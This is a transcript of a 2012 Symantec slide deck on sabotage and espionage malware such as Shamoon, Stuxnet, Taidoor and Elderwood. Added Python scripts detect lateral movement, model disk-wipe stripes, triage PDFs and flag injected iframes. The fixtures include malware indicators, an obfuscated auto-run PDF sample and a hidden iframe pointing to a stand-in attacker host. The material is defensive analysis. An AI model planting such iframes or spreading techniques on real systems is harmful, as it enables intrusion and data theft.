Source: vox.veritas.com/legacyfs/online/veritasdata/is b08.pdf (transcript of the slide deck)
The New Era of Cyber Threats
Orla Cox, Sr Manager, Security Response
Sean Kiernan, Manager, Development, Security Response
Symantec Security Response
SYMANTEC VISION 2012
Some Interesting Statistics…
• 403 million new malware variants discovered in 2011
• 13 new malware variants discovered per second
• 5.5 billion attacks blocked by Symantec in 2011
What Drives the Modern Day Attacks?
(diagram) Three drivers and the attack types grouped under each:
• Hacktivism: DDoS, defacement
• Money: banking Trojans, extortion, scams
• Targeted attacks: sabotage, espionage
Targeted Attacks - Sabotage

Sabotage Attacks
“So cyberspace is real.... It’s the great irony of our Information Age – the very technologies that empower us to create and to build also empower those who would disrupt and destroy.”
– Barack Obama
Some Background…
• Damaging attacks used to be done for “fun”
• Attackers aim to cause havoc and disruption
• Attacks causing damage are becoming more organized
• Potential state involvement
Timeline of Attacks on Critical Infrastructure (2007 to 2012)
• APR 2007: Estonia DDoS
• JUL 2010: W32.Stuxnet
• SEP 2011: W32.Duqu [dyü-kyü]
• MAY 2012: W32.Flamer
• AUG 2012: W32.Gauss
• SEP 2012: W32.Disttrack
The Rogue Gallery
Recent threats used to perform sabotage on victims…

W32.Disttrack
• Year: 2012
• Exploits: 0
• Region: Middle East
• Actions: Deletes files/OS
• Notes: Overwrites MBR

W32.Stuxnet
• Year: 2010
• Exploits: 4
• Region: Middle East/Asia
• Actions: Damages machinery
• Notes: Siemens PLC code

W32.Flamer
• Year: 2012
• Exploits: 2
• Region: Middle East
• Actions: Deletes files/OS
• Notes: Steals information; uses Bluetooth
Case Study: W32.Disttrack – Shamoon Attacks
• Destructive attacks against energy companies
• Two Middle Eastern organizations targeted in quick succession
• Multi-stage attack:
  • Gather information about the target network
  • Acquire user credentials
  • Gain access to domain controllers
  • Spread to computers across the network
  • Trigger the destructive payload
W32.Disttrack Behavior
Main module
• Runs either as a service (no command line args) or as an executable (with command line args)
• Copies itself to: %System%\trksvr.exe
• Starts service: TrkSvr
• Deletes itself
• Decision point: past destruction date? (the wiper is only triggered once the configured date has passed)
• Drops and runs PKCS7 (C&C server communications module), filename: netinit.exe
• Drops and runs PKCS12 (disk wiper component), filename: %System%\[RANDOM NAME].exe
Attack local network shares
• Copies itself to:
  \\[REMOTE IP]\ADMIN$\system32\[RANDOM NAME].exe
  \\[REMOTE IP]\C$\system32\[RANDOM NAME].exe
  \\[REMOTE IP]\D$\system32\[RANDOM NAME].exe
  \\[REMOTE IP]\E$\system32\[RANDOM NAME].exe
• Executes itself on the remote machine using: 1. a scheduled remote job, or 2. creation of a remote service
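The spreading behaviour described above leaves a recognisable trail in Windows logs: a write to an administrative share's system32 folder, followed seconds later on the same host by a service install or scheduled-task creation pointing at the file that was just written. The script below, an example added here rather than code from the Symantec deck, correlates those two steps. The event records are constructed inline to mimic Security event 5145 (network share object accessed), System event 7045 (service installed) and Security event 4698 (scheduled task created); the field names, the ten-minute window and the host/IP values are this example's own assumptions, not a real log schema.

```python
"""Correlate Windows events into Disttrack-style lateral movement alerts.

Added example, not from the Symantec deck. Records are constructed to mimic:
  5145 - network share object accessed (carries share name and relative target)
  7045 - a service was installed (carries service name and image path)
  4698 - a scheduled task was created (carries task name and command)
Field names below are simplifications chosen for readability (assumption).
"""
from datetime import datetime, timedelta
import ntpath

ADMIN_SHARES = {"ADMIN$", "C$", "D$", "E$"}   # shares named on the slide
KNOWN_SERVICE = "trksvr"                       # service TrkSvr from the slide
KNOWN_FILES = {"trksvr.exe", "netinit.exe"}    # file names from the slide
WINDOW = timedelta(minutes=10)                 # max gap between drop and execution (assumption)

# Constructed sample events (not real logs). 10.0.0.5 plays the already-infected pivot.
EVENTS = [
    {"time": "2012-08-15T11:00:02", "id": 5145, "host": "WS-07", "src_ip": "10.0.0.5",
     "share": r"\\*\ADMIN$", "target": r"system32\xyzqa.exe", "access": "WriteData"},
    {"time": "2012-08-15T11:00:04", "id": 7045, "host": "WS-07",
     "service": "xyzqa", "image": r"C:\Windows\system32\xyzqa.exe"},
    {"time": "2012-08-15T11:02:10", "id": 5145, "host": "WS-08", "src_ip": "10.0.0.5",
     "share": r"\\*\C$", "target": r"system32\bqmnd.exe", "access": "WriteData"},
    {"time": "2012-08-15T11:02:15", "id": 4698, "host": "WS-08",
     "task": "bqmnd", "command": r"C:\Windows\system32\bqmnd.exe"},
    {"time": "2012-08-15T11:05:00", "id": 7045, "host": "WS-09",
     "service": "TrkSvr", "image": r"C:\Windows\system32\trksvr.exe"},
    # Benign: a document copied to a user share, no execution primitive follows.
    {"time": "2012-08-15T11:06:00", "id": 5145, "host": "WS-10", "src_ip": "10.0.0.9",
     "share": r"\\*\Users", "target": r"bob\report.docx", "access": "WriteData"},
    # Benign: a service installed from Program Files with no prior share write.
    {"time": "2012-08-15T11:07:00", "id": 7045, "host": "WS-10",
     "service": "Spooler2", "image": r"C:\Program Files\Vendor\svc.exe"},
]


def _ts(event):
    return datetime.fromisoformat(event["time"])


def _share(path):
    # \\*\ADMIN$ -> ADMIN$ (share names are case-insensitive)
    return path.rstrip("\\").split("\\")[-1].upper()


def _base(path):
    # ntpath handles backslash paths on any platform
    return ntpath.basename(path).lower()


def admin_share_drops(events):
    """5145 events that write an .exe under system32 on an administrative share."""
    return [e for e in events
            if e["id"] == 5145
            and _share(e["share"]) in ADMIN_SHARES
            and e["target"].lower().startswith("system32\\")
            and e["target"].lower().endswith(".exe")
            and "write" in e["access"].lower()]


def find_lateral_movement(events):
    """Pair each admin-share drop with a service/task on the same host that runs that file."""
    drops = admin_share_drops(events)
    execs = [e for e in events if e["id"] in (7045, 4698)]
    alerts = []
    for d in drops:
        for x in execs:
            if x["host"] != d["host"]:
                continue
            binary = x["image"] if x["id"] == 7045 else x["command"]
            if _base(binary) != _base(d["target"]):
                continue
            gap = _ts(x) - _ts(d)
            if timedelta(0) <= gap <= WINDOW:
                via = "remote service" if x["id"] == 7045 else "scheduled job"
                alerts.append({"host": d["host"], "from": d["src_ip"], "file": _base(binary),
                               "via": via, "seconds": int(gap.total_seconds())})
    return alerts


def pivot_hosts(alerts):
    """Group victims by the machine that wrote to their admin shares: the infected pivot."""
    pivots = {}
    for a in alerts:
        pivots.setdefault(a["from"], set()).add(a["host"])
    return pivots


def known_indicators(events):
    """Service installs matching the names the slide attributes to the main module."""
    return [(e["host"], e["service"], _base(e["image"])) for e in events
            if e["id"] == 7045
            and (e["service"].lower() == KNOWN_SERVICE or _base(e["image"]) in KNOWN_FILES)]


if __name__ == "__main__":
    found = find_lateral_movement(EVENTS)
    for a in found:
        print("%(host)s: %(file)s dropped from %(from)s, run via %(via)s after %(seconds)ss" % a)
    print("pivot hosts:", pivot_hosts(EVENTS and found))
    print("known indicators:", known_indicators(EVENTS))
```

The behavioural correlation matters more than the name match: the random file names on the slide defeat `known_indicators`, but a drop-then-execute pair on an admin share is the same regardless of the name, and grouping alerts by the source address surfaces the pivot machine that should be isolated first.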
W32.Disttrack – Wiping Module
• Uses a legitimate disk driver to read/write disk sectors
• Identifies all system and boot partitions and wipes them all
• Overwrites files with random strings, creating the following pattern on the disk:
  192K wiped | 1 MB untouched | 192K wiped | 1 MB untouched | …
• Overwrites the MBR with 192K of random data
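The striped pattern on this slide has a practical consequence for incident response: most of the disk survives, and what survives is predictable. The script below, an example added here and not code from the deck or from the malware, models the stripe layout, simulates it on a constructed in-memory image, and shows which file headers can still be carved afterwards. It assumes "192K" means 192 × 1024 bytes, "1 MB" means 1024 × 1024 bytes, and that the first wiped stripe starts at offset 0 where the MBR lives; the exact alignment of the real sample may differ, in which case only the constants change.

```python
"""Model the W32.Disttrack wipe stripes for forensic triage.

Added example, not from the Symantec deck or the malware. The disk image and
the FILEHDR markers below are constructed; binary units and stripe alignment
at offset 0 are assumptions.
"""
import os

WIPED = 192 * 1024          # bytes overwritten per stripe ("192K")
UNTOUCHED = 1024 * 1024     # bytes left alone per stripe ("1 MB")
STRIDE = WIPED + UNTOUCHED
TAG = b"FILEHDR"            # stands in for a file header we would carve for
MARKER_EVERY = 256 * 1024   # constructed: one marker every 256 KB
SIZE = 4 * STRIDE           # constructed image: four full stripes


def stripes(size):
    """Yield (start, end, wiped) regions covering [0, size)."""
    offset = 0
    while offset < size:
        yield offset, min(offset + WIPED, size), True
        if offset + WIPED < size:
            yield offset + WIPED, min(offset + STRIDE, size), False
        offset += STRIDE


def wiped_ranges(size):
    return [(s, e) for s, e, w in stripes(size) if w]


def untouched_ranges(size):
    return [(s, e) for s, e, w in stripes(size) if not w]


def is_wiped(offset):
    """True if a byte at this offset falls inside a wiped stripe."""
    return offset % STRIDE < WIPED


def survival_fraction(size):
    """Share of the volume the wiper never touches (1024/1216, about 84%)."""
    return sum(e - s for s, e in untouched_ranges(size)) / size


def build_image(size=SIZE):
    """Zero-filled image with a numbered marker at every MARKER_EVERY offset."""
    img = bytearray(size)
    for i, off in enumerate(range(0, size, MARKER_EVERY)):
        tag = TAG + b"%04d" % i
        img[off:off + len(tag)] = tag
    return img


def simulate_wipe(image):
    """Overwrite each wiped stripe with random bytes, as the slide describes."""
    out = bytearray(image)
    for s, e in wiped_ranges(len(out)):
        out[s:e] = os.urandom(e - s)
    return out


def surviving_markers(image):
    """Offsets at which the marker is still intact (what a carver would find)."""
    found, start = [], 0
    while True:
        idx = image.find(TAG, start)
        if idx < 0:
            return found
        found.append(idx)
        start = idx + 1


def predicted_survivors(size=SIZE, tag_len=11):
    """Markers wholly inside untouched stripes, from the layout alone."""
    return [off for off in range(0, size, MARKER_EVERY)
            if not is_wiped(off) and not is_wiped(off + tag_len - 1)]


if __name__ == "__main__":
    print("survives: %.1f%%" % (100 * survival_fraction(SIZE)))
    after = simulate_wipe(build_image())
    print("markers before/after:", len(surviving_markers(build_image())),
          len(surviving_markers(after)))
    print("layout prediction matches:", surviving_markers(after) == predicted_survivors())
```

Two points follow for a responder. Because the MBR and partition tables sit in the first wiped stripe, the volume looks empty to the OS even though roughly five-sixths of the sectors are intact, so recovery starts with rebuilding the partition table and carving, not with a filesystem mount. And any file larger than 1 MB spans at least one wiped stripe, so large files come back with 192K holes at stride-aligned offsets; `untouched_ranges()` gives the exact map to carve against.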
Targeted Attacks - Espionage

Espionage
“Targeted threats are a class of malware destined for one specific organization or industry. A type of crimeware, these threats are of particular concern because they are designed to capture sensitive information.” – Wikipedia
Timeline of Cyber Espionage Attacks (2007 to 2012)
• JUN 2008: Ghostnet
• JUN 2009: W32.Stuxnet
• DEC 2009: Hydraq/Aurora
• FEB 2011: Night Dragon
• FEB 2012: Trojan.Taidoor (台门)
• FEB 2012: LuckyCat
• SEP 2012: Elderwood
Information Theft
• Information is a source of wealth & power
• Information is a key asset of any organization
• Types of info: designs, business plans, financial info, personnel info
Targeted Attacks Do Happen
• Industrial espionage, hacktivism or state-sponsored activity
• 151 targeted attacks per day in June 2012
• Small businesses are often not well protected, but are connected to others
Number of employees of the targeted organization, per attack (chart):
• 1-250: 37%
• 251-500: 2.9%
• 501-1000: 2.9%
• 1001-1500: 2.6%
• 1501-2500: 11%
• 2501+: 44%
Top 10 Most Attacked Sectors 2011
(chart; sector labels are not preserved in the transcript, only the shares: 25.4%, 15.4%, 13.5%, 6.2%, 6%, 5.9%, 4.3%, 3.2%, 3.2%, 3%)
How They Operate
Stages: RECONNAISSANCE, INCURSION, DISCOVERY, CAPTURE, EXFILTRATION
• INCURSION: Attacker breaks into the network by delivering targeted malware to vulnerable systems and employees
• DISCOVERY: Attacker then maps the organization’s defenses from the inside and creates a battle plan
• CAPTURE: Accesses data on unprotected systems; installs malware to secretly acquire data or disrupt operations
• EXFILTRATION: Data is sent to the attacker for analysis; information may be used for various purposes including fraud and planning further attacks

How Are The Attacks Carried Out?
Case Study: Taidoor (Trojan.Taidoor, 台门)
• 4-year-long targeted attack campaign targeting influencers of US/Taiwanese policy
• Targeted a variety of industries, but over time the focus narrowed towards think tanks
• Peak number of targeted emails coincided with a US-Taiwanese defence industry conference in Sept 2011
• “Mr X”, a naval warfare expert, was of particular interest
• Targeted 66 times in 2011!
Case Study: Taidoor (continued)
(chart; segment labels are not preserved in the transcript: 47%, 31%, 12%, 5%)
• Highly targeted email-based attacks
• Emails usually contain files with exploit code (rarely use zero-days)
• Emails may be generic or tailored for each targeted individual
• PDF is the most commonly used file format for these attacks
Spear Phishing Attacks – How It Works
1. Attacker sends email with a malicious document or link
2. Exploit is triggered when the user opens the document or clicks on the link
3. Backdoor is installed
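The Taidoor slides say the attachments carry exploit code, that zero-days are rare, and that PDF is the most common carrier. A malicious PDF that exploits a reader usually needs some active-content hook to fire on open, and that is visible without executing anything. The triage below is an example added here, not code from the Symantec deck: it tokenizes PDF name objects, undoes the `#xx` hex escapes attackers use to hide names such as `/JavaScript`, and reports the features that let a document run code or open something when viewed. Both PDFs are constructed inline; the feature list and the risk wording are this example's own.

```python
"""Static triage of a PDF attachment for active-content features.

Added example, not from the Symantec deck. The two PDFs below are constructed
for the demonstration. Names inside compressed object streams (/ObjStm) are
not inflated here, so their presence is reported as its own hint.
"""
import re

SUSPICIOUS = ("/OpenAction", "/AA", "/JavaScript", "/JS", "/Launch",
              "/EmbeddedFile", "/RichMedia", "/ObjStm")
NAME_RE = re.compile(rb"/[A-Za-z0-9#]+")       # PDF name tokens, hex escapes allowed
HEX_RE = re.compile(rb"#([0-9A-Fa-f]{2})")     # /J#61vaScript -> /JavaScript


def normalize_name(raw):
    """Decode #xx escapes so obfuscated names compare equal to plain ones."""
    return HEX_RE.sub(lambda m: bytes([int(m.group(1), 16)]), raw).decode("latin-1")


def count_names(pdf):
    """Count the suspicious names and how many of them were hex-obfuscated."""
    counts = {n: 0 for n in SUSPICIOUS}
    obfuscated = 0
    for m in NAME_RE.finditer(pdf):
        raw = m.group(0)
        name = normalize_name(raw)
        if name in counts:
            counts[name] += 1
            if b"#" in raw:
                obfuscated += 1
    counts["obfuscated_names"] = obfuscated
    return counts


def triage(pdf):
    """Return (verdict, reasons, counts) for one attachment."""
    c = count_names(pdf)
    reasons = []
    if not pdf.startswith(b"%PDF"):
        reasons.append("missing %PDF header")
    auto = c["/OpenAction"] or c["/AA"]           # fires on open / on an event
    script = c["/JavaScript"] or c["/JS"]
    if auto and script:
        reasons.append("script runs automatically on open")
    elif script:
        reasons.append("embedded JavaScript")
    if c["/Launch"]:
        reasons.append("launch action" + (" on open" if auto else ""))
    if c["/EmbeddedFile"]:
        reasons.append("embedded file")
    if c["/RichMedia"]:
        reasons.append("RichMedia (Flash) content")
    if c["/ObjStm"]:
        reasons.append("object streams present (names inside are compressed, not inspected here)")
    if c["obfuscated_names"]:
        reasons.append("hex-escaped name tokens")
    verdict = "suspicious" if reasons else "no active content found"
    return verdict, reasons, c


# Constructed sample: an OpenAction that runs JavaScript, with the action
# name hex-escaped to dodge a naive string match.
MALICIOUS_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
4 0 obj << /Type /Action /S /J#61vaScript /JS (app.alert('x');) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Constructed sample: one page of text, nothing active.
BENIGN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Contents 4 0 R >> endobj
4 0 obj << /Length 44 >> stream
BT /F1 24 Tf 72 700 Td (Quarterly report) Tj ET
endstream endobj
trailer << /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    for label, doc in (("malicious", MALICIOUS_PDF), ("benign", BENIGN_PDF)):
        verdict, reasons, _ = triage(doc)
        print("%s: %s %s" % (label, verdict, reasons))
```

This is a triage filter, not a detector of the exploit itself: a document that targets a parser bug in font or image handling needs none of these names and would pass clean, which is why the slide pairs attachment checks with exploit-mitigation technologies later in the deck. It does, however, catch the common case and the common evasion (hex-escaped names), and a real implementation would add inflation of `/FlateDecode` object streams before matching.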
Case Study: Elderwood Project
• Long-running series of campaigns
• Same group responsible for the Hydraq/Aurora attacks in 2009
• Unlike many other groups, the Elderwood gang have access to zero-days
• Better equipped than other groups that we have seen
  – Nitro group used 1 zero-day
  – Sykipot group used 2 zero-days
  – Stuxnet used 4 zero-days
  – Elderwood have used 8 zero-days!
• Uses both spear-phishing and watering hole attacks
Watering Hole Attacks – How They Work
Usage increased substantially in 2012.
Steps in the attack:
1. Attacker hacks a legitimate Web server and injects an IFRAME into its Web pages
2. User browses to the legitimate Web site
3. Returned Web pages contain the IFRAME pointing to a server hosting an exploit kit
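The injected IFRAME in step 1 is what a site owner or a proxy can look for, since the exploit kit's frame is almost always hidden and points off-site. The script below is an example added here, not code from the Symantec deck: it parses fetched HTML with the standard library, flags iframes that are near-zero size, hidden by CSS, or sourced from a host other than the page's own, and shows the more reliable check available to a site owner, diffing the live page against a known-good copy. The two pages, the hostnames (reserved `.test` names) and the indicator list are this example's assumptions.

```python
"""Flag injected IFRAMEs in fetched HTML (watering-hole indicator).

Added example, not from the Symantec deck. Sample pages and hostnames are
constructed; the indicator heuristics are this example's own.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


class _IframeCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag names; attribute values may be None.
        if tag == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def collect_iframes(html):
    parser = _IframeCollector()
    parser.feed(html)
    return parser.iframes


def _near_zero(value):
    """'0', '0px', '1', '1px' count as invisible; anything unparsable does not."""
    v = value.strip().lower()
    if v.endswith("px"):
        v = v[:-2].strip()
    try:
        return float(v) <= 1
    except ValueError:
        return False


def _hidden_by_css(style):
    s = style.replace(" ", "").lower()
    return any(tok in s for tok in ("display:none", "visibility:hidden", "left:-", "top:-"))


def iframe_reasons(frame, page_url):
    """Reasons this iframe looks injected; empty list means nothing suspicious."""
    reasons = []
    src_host = urlparse(frame.get("src", "")).hostname   # handles // protocol-relative too
    page_host = urlparse(page_url).hostname
    if src_host and page_host and src_host != page_host:
        reasons.append("external src host " + src_host)
    if _near_zero(frame.get("width", "")) or _near_zero(frame.get("height", "")):
        reasons.append("near-zero size")
    if _hidden_by_css(frame.get("style", "")):
        reasons.append("hidden by CSS")
    return reasons


def suspicious_iframes(html, page_url):
    """[(src, reasons)] for every iframe with at least one indicator."""
    result = []
    for frame in collect_iframes(html):
        reasons = iframe_reasons(frame, page_url)
        if reasons:
            result.append((frame.get("src", ""), reasons))
    return result


def injected_since(baseline_html, current_html, page_url):
    """Site-owner check: suspicious iframes absent from the known-good copy."""
    baseline = {f.get("src", "") for f in collect_iframes(baseline_html)}
    return [(src, r) for src, r in suspicious_iframes(current_html, page_url)
            if src not in baseline]


# Constructed pages. The first iframe is the site's own banner; the second is the injection.
PAGE_URL = "http://www.example-industry-news.test/news/index.html"
CLEAN = """<html><body><h1>Industry News</h1>
<iframe src="http://www.example-industry-news.test/ads/banner.html" width="300" height="250"></iframe>
</body></html>"""
INJECTED = """<html><body><h1>Industry News</h1>
<iframe src="http://www.example-industry-news.test/ads/banner.html" width="300" height="250"></iframe>
<iframe src="http://kit.example-attacker.test/in.php" width="0" height="0" style="visibility:hidden"></iframe>
</body></html>"""

if __name__ == "__main__":
    for src, reasons in suspicious_iframes(INJECTED, PAGE_URL):
        print(src, reasons)
    print("new since baseline:", [s for s, _ in injected_since(CLEAN, INJECTED, PAGE_URL)])
```

The heuristics alone produce false positives on sites that legitimately embed hidden third-party frames, which is why the baseline diff is the stronger control for the site owner: an iframe that was not in the last deployed copy of the page is the finding, whatever its attributes. From the visitor's side, the off-site host in the frame is the same domain the deck's URL-filtering row says is typically unknown to reputation lists, so blocking on that alone is unreliable.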
Who’s Targeted
Targets may be any organization with valuable intellectual property: defense, shipping, aeronautics, arms, energy, manufacturing, engineering, electronics, financial, NGO, software.
There may be primary and secondary targets. Secondary targets are used as stepping stones to the primary target.
Targeted Attacks - Conclusion
• Attackers are persistent
  – Attack campaigns can span several years
  – Individuals may be targeted multiple times
• Attacks aren’t always sophisticated, and don’t always use zero-days
• The majority of attacks originate through email, although watering hole techniques are increasing
• Attackers most often seek intellectual property
Demonstration
Protecting Against Modern Attacks

Technology                                   Effectiveness  Reason
Email/IM SPAM Filtering                      Weak           Personalized emails to victims evade SPAM filters
Antivirus Signature Scanning                 Weak           Attackers can pre-scan executables with existing AV software and modify them until they are no longer detected; spaghetti code confuses heuristic scanning
Intrusion Prevention Systems                 Moderate       Most 0-day attacks evade IPS scanners; protocol anomaly detection may have blocked post-infection communications
Browser Shield & Buffer Overflow Protection  High           Doesn’t require a-priori knowledge of the exploit; triggers on anomalies in the execution path
URL Blocking / Content Filtering             Weak           Attacker-generated domains are unknown to the filter, and are therefore typically allowed
File Reputation Scanning                     High           Relies only on the community reputation of the file, which is typically low for personalized malware files
Behavior Blocking                            High           Prevents malicious behaviors
Application and Device Control               Moderate       Blocks external devices; prevents some exploit conditions
Data Loss Prevention                         Moderate       Network compromised, but sensitive data retained
.Cloud Email Security                        High           Advanced email heuristics block targeted attack emails
How to get more information
Blog http://www.symantec.com/connect/symantec-blogs/sr
Twitter http://twitter.com/threatintel
Whitepapers http://www.symantec.com/security_response/whitepapers.jsp
Thank you!
Copyright © 2011 Symantec Corporation. All rights reserved. Symantec and the Symantec Logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in the U.S. and other countries. Other names may be trademarks of their respective owners. This document is provided for informational purposes only and is not intended as advertising. All warranties relating to the information in this document, either express or implied, are disclaimed to the maximum extent allowed by law. The information in this document is subject to change without notice.
Other sessions of interest
• ISB09 (114, tomorrow 9:00)
  – SONAR, Insight, Skeptic and GIN - The Symantec secret sauce
• ISB12/13/14 (117, this afternoon)
  – Messaging security deployment options - which is really best for you?
  – Web security deployment options - which is really best for you?
  – Are You Getting the Most From Symantec Protection Suite?
• ISB11 (114, tomorrow 11:45)
  – Demo: integrating Symantec products to get the ultimate protection
• ISB07 (114, tomorrow 13:45)
  – The roadmap for Symantec infrastructure protection products